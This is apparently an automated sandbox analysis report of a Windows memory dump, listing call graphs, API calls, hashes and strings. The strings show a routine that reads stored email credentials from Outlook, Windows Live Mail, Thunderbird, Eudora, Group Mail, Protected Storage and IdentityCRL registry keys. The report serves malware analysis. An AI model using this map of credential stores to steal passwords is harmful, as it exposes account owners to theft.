strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34100 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34085 407f3f 34083->34085 34086 407f46 strlen strlen 34084->34086 34087 407f3a 34084->34087 34085->34086 34089 407f7f 34085->34089 34086->34089 34090 407f76 34086->34090 34088 407f90 FindClose 34087->34088 34088->34085 34089->34060 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34101 34093 407e6c strcmp 34092->34093 34095 407e94 34092->34095 34094 407e83 strcmp 34093->34094 34093->34095 34094->34095 34095->34070 34097 407fa3 34096->34097 34098 407f99 FindClose 34096->34098 34097->34071 34098->34097 34099->34060 34100->34080 34101->34089 34102->33524 34103->33528 34104->33534 34105->33536 34106->33541 34107->33538 34108->33533 34117 411853 RtlInitializeCriticalSection memset 34118 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34291 40a256 13 API calls 34293 432e5b 17 API calls 34295 43fa5a 20 API calls 34120 401060 41 API calls 34298 427260 CloseHandle memset memset 33198 410c68 FindResourceA 33199 410c81 SizeofResource 33198->33199 33202 410cae 33198->33202 33200 410c92 LoadResource 33199->33200 33199->33202 33201 410ca0 LockResource 33200->33201 33200->33202 33201->33202 34300 405e69 14 API calls 34125 433068 15 API calls __fprintf_l 34302 414a6d 18 API calls 34303 43fe6f 134 API calls 34127 424c6d 15 API calls __fprintf_l 34304 426741 19 API calls 34129 440c70 17 API calls 34130 443c71 44 API calls 34133 427c79 24 API calls 34307 416e7e memset __fprintf_l 34137 42800b 47 API calls 34138 425115 85 API calls __fprintf_l 34310 41960c 61 API calls 34139 43f40c 122 API calls __fprintf_l 34142 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34143 43f81a 20 API calls 34145 414c20 memset memset 34146 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34314 414625 18 API calls 34315 
404225 modf 34316 403a26 strlen WriteFile 34318 40422a 12 API calls 34322 427632 memset memset memcpy 34323 40ca30 59 API calls 34324 404235 26 API calls 34147 42ec34 61 API calls __fprintf_l 34148 425115 76 API calls __fprintf_l 34325 425115 77 API calls __fprintf_l 34327 44223a 38 API calls 34154 43183c 112 API calls 34328 44b2c5 _onexit __dllonexit 34333 42a6d2 memcpy __allrem 34156 405cda 65 API calls 34341 43fedc 138 API calls 34342 4116e1 16 API calls __fprintf_l 34159 4244e6 19 API calls 34161 42e8e8 127 API calls __fprintf_l 34162 4118ee RtlLeaveCriticalSection 34347 43f6ec 22 API calls 34164 425115 119 API calls __fprintf_l 33188 410cf3 EnumResourceNamesA 34350 4492f0 memcpy memcpy 34352 43fafa 18 API calls 34354 4342f9 15 API calls __fprintf_l 34165 4144fd 19 API calls 34356 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34357 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34360 443a84 _mbscpy 34362 43f681 17 API calls 34168 404487 22 API calls 34364 415e8c 16 API calls __fprintf_l 34172 411893 RtlDeleteCriticalSection __fprintf_l 34173 41a492 42 API calls 34368 403e96 34 API calls 34369 410e98 memset SHGetPathFromIDList SendMessageA 34175 426741 109 API calls __fprintf_l 34176 4344a2 18 API calls 34177 4094a2 10 API calls 34372 4116a6 15 API calls __fprintf_l 34373 43f6a4 17 API calls 34374 440aa3 20 API calls 34376 427430 45 API calls 34180 4090b0 7 API calls 34181 4148b0 15 API calls 34183 4118b4 RtlEnterCriticalSection 34184 4014b7 CreateWindowExA 34185 40c8b8 19 API calls 34187 4118bf RtlTryEnterCriticalSection 34381 42434a 18 API calls __fprintf_l 34383 405f53 12 API calls 34195 43f956 59 API calls 34197 40955a 17 API calls 34198 428561 36 API calls 34199 409164 7 API calls 34387 404366 19 API calls 34391 40176c ExitProcess 34394 410777 42 API calls 34204 40dd7b 51 API calls 34205 425d7c 16 API calls __fprintf_l 34396 43f6f0 25 API calls 34397 42db01 22 API calls 34206 412905 15 API calls __fprintf_l 34398 403b04 
54 API calls 34399 405f04 SetDlgItemTextA GetDlgItemTextA 34400 44b301 ??3@YAXPAX 34403 4120ea 14 API calls 3 library calls 34404 40bb0a 8 API calls 34406 413f11 strcmp 34210 434110 17 API calls __fprintf_l 34213 425115 108 API calls __fprintf_l 34407 444b11 _onexit 34215 425115 76 API calls __fprintf_l 34218 429d19 10 API calls 34410 444b1f __dllonexit 34411 409f20 _strcmpi 34220 42b927 31 API calls 34414 433f26 19 API calls __fprintf_l 34415 44b323 FreeLibrary 34416 427f25 46 API calls 34417 43ff2b 17 API calls 34418 43fb30 19 API calls 34227 414d36 16 API calls 34229 40ad38 7 API calls 34420 433b38 16 API calls __fprintf_l 34421 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34233 426741 21 API calls 34234 40c5c3 125 API calls 34236 43fdc5 17 API calls 34422 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34239 4161cb memcpy memcpy memcpy memcpy 33203 44b3cf 33204 44b3e6 33203->33204 33206 44b454 33203->33206 33204->33206 33210 44b40e 33204->33210 33207 44b405 33207->33206 33208 44b435 VirtualProtect 33207->33208 33208->33206 33209 44b444 VirtualProtect 33208->33209 33209->33206 33211 44b413 33210->33211 33214 44b454 33211->33214 33217 44b42b 33211->33217 33213 44b41c 33213->33214 33215 44b435 VirtualProtect 33213->33215 33215->33214 33216 44b444 VirtualProtect 33215->33216 33216->33214 33218 44b431 33217->33218 33219 44b435 VirtualProtect 33218->33219 33221 44b454 33218->33221 33220 44b444 VirtualProtect 33219->33220 33219->33221 33220->33221 34427 43ffc8 18 API calls 34240 4281cc 15 API calls __fprintf_l 34429 4383cc 110 API calls __fprintf_l 34241 4275d3 41 API calls 34430 4153d3 22 API calls __fprintf_l 34242 444dd7 _XcptFilter 34435 4013de 15 API calls 34437 425115 111 API calls __fprintf_l 34438 43f7db 18 API calls 34441 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34244 4335ee 16 API calls __fprintf_l 34443 429fef 11 API calls 34245 444deb _exit _c_exit 34444 40bbf0 138 API calls 34248 425115 79 API calls __fprintf_l 34448 
437ffa 22 API calls 34252 4021ff 14 API calls 34253 43f5fc 149 API calls 34449 40e381 9 API calls 34255 405983 40 API calls 34256 42b186 27 API calls __fprintf_l 34257 427d86 76 API calls 34258 403585 20 API calls 34260 42e58e 18 API calls __fprintf_l 34263 425115 75 API calls __fprintf_l 34265 401592 8 API calls 33189 410b92 33192 410a6b 33189->33192 33191 410bb2 33193 410a77 33192->33193 33194 410a89 GetPrivateProfileIntA 33192->33194 33197 410983 memset _itoa WritePrivateProfileStringA 33193->33197 33194->33191 33196 410a84 33196->33191 33197->33196 34453 434395 16 API calls 34267 441d9c memcmp 34455 43f79b 119 API calls 34268 40c599 43 API calls 34456 426741 87 API calls 34272 4401a6 21 API calls 34274 426da6 memcpy memset memset memcpy 34275 4335a5 15 API calls 34277 4299ab memset memset memcpy memset memset 34278 40b1ab 8 API calls 34461 425115 76 API calls __fprintf_l 34465 4113b2 18 API calls 2 library calls 34469 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33235 40765c 33233->33235 33234->33232 33236 4076a3 33235->33236 33239 40737c strtoul 33235->33239 33236->33232 33238->33231 33239->33235 34280 40b5bf memset memset _mbsicmp

                                                Control-flow Graph

                                                • control_flow_graph, first block 4082cd-40841a
                                                APIs
                                                • memset.MSVCRT ref: 0040832F
                                                • memset.MSVCRT ref: 00408343
                                                • memset.MSVCRT ref: 0040835F
                                                • memset.MSVCRT ref: 00408376
                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                • strlen.MSVCRT ref: 004083E9
                                                • strlen.MSVCRT ref: 004083F8
                                                • memcpy.MSVCRT ref: 0040840A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                • String ID: 5$H$O$b$i$}$}
                                                • API String ID: 1832431107-3760989150
                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • control_flow_graph, first block 407ef8-407f01
                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                • strlen.MSVCRT ref: 00407F5C
                                                • strlen.MSVCRT ref: 00407F64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileFindstrlen$FirstNext
                                                • String ID: ACD
                                                • API String ID: 379999529-620537770
                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00401E8B
                                                • strlen.MSVCRT ref: 00401EA4
                                                • strlen.MSVCRT ref: 00401EB2
                                                • strlen.MSVCRT ref: 00401EF8
                                                • strlen.MSVCRT ref: 00401F06
                                                • memset.MSVCRT ref: 00401FB1
                                                • atoi.MSVCRT ref: 00401FE0
                                                • memset.MSVCRT ref: 00402003
                                                • sprintf.MSVCRT ref: 00402030
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • memset.MSVCRT ref: 00402086
                                                • memset.MSVCRT ref: 0040209B
                                                • strlen.MSVCRT ref: 004020A1
                                                • strlen.MSVCRT ref: 004020AF
                                                • strlen.MSVCRT ref: 004020E2
                                                • strlen.MSVCRT ref: 004020F0
                                                • memset.MSVCRT ref: 00402018
                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                • _mbscpy.MSVCRT ref: 00402177
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                • API String ID: 1846531875-4223776976
                                                • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                • API String ID: 745651260-375988210
                                                • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                • _mbscpy.MSVCRT ref: 00403E54
                                                Strings
                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                • pstorec.dll, xrefs: 00403C30
                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                • PStoreCreateInstance, xrefs: 00403C44
                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                • API String ID: 1197458902-317895162
                                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                • String ID: k:v
                                                • API String ID: 3662548030-4078055367
                                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                • memcpy.MSVCRT ref: 0040FBE4
                                                • memcpy.MSVCRT ref: 0040FBF9
                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                • API String ID: 2768085393-2409096184
                                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0044430B
                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                • memset.MSVCRT ref: 00444379
                                                • memset.MSVCRT ref: 00444394
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                • strlen.MSVCRT ref: 004443DB
                                                • _strcmpi.MSVCRT ref: 00444401
                                                Strings
                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                • Store Root, xrefs: 004443A5
                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                • API String ID: 832325562-2578778931
                                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040F567
                                                • memset.MSVCRT ref: 0040F57F
                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                • memcpy.MSVCRT ref: 0040F652
                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                • String ID:
                                                • API String ID: 2012582556-3916222277
                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 004037EB
                                                • memset.MSVCRT ref: 004037FF
                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                • strchr.MSVCRT ref: 0040386E
                                                • _mbscpy.MSVCRT ref: 0040388B
                                                • strlen.MSVCRT ref: 00403897
                                                • sprintf.MSVCRT ref: 004038B7
                                                • _mbscpy.MSVCRT ref: 004038CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                • String ID: %s@yahoo.com
                                                • API String ID: 317221925-3288273942
                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadMessageProc
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 2780580303-317687271
                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00403504
                                                • memset.MSVCRT ref: 0040351A
                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                • _mbscpy.MSVCRT ref: 00403555
                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                • _mbscat.MSVCRT ref: 0040356D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                • String ID: InstallPath$Software\Group Mail$fb.dat
